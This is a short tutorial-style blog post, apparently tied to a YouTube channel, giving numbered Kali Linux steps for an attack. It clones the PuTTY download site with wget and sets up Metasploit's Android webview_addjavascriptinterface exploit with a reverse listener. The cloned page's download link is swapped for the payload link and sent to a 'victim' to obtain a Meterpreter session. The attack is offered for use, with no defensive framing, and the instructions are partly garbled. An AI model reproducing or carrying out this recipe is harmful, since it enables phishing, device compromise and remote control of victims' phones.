HERE IS TRICKS AND TECHNOLOGY
KALI LINUX COMMANDS
STEP 1 open the terminal
STEP 2 wget -mk https://www.putty.org/
STEP 3 now create the payload
STEP 4 open metasploit using msfconsole
STEP 5 now the metasploit is opened
STEP 6 use exploit/android/browser/webview_addjavascriptinterface
STEP 7 show options
STEP 8 set URIPATH /
STEP 9 set LHOST your ip address
STEP 10 set LPORT 8080
STEP 11 show advanced
STEP 12 set ReverseListenerBindPort 2737
STEP 13 set VERBOSE true
STEP 14 run
STEP 15 there will be the https://0.0.0.0/8080
there will be the link copy that
STEP 16 open the index.html from putty
STEP 17 open the intex.html
STEP 18 press the crt+f and check the here word
STEP 19 there will link eraser it and paste the payload link and save it
STEP 20 now send to victim
IF VICTIM CLICK THE HERE IT DOWNLOAD YOU WILL GET THE METERPRETER SESSIONS
I HOPE THAT YOU WILL UNDERSTAND AND PLEASE SUBSCRIBE TAMILCODE
YOUR THE VISUAL LEARNER PLEASE SEE THE VIDEO HERE
0 Comments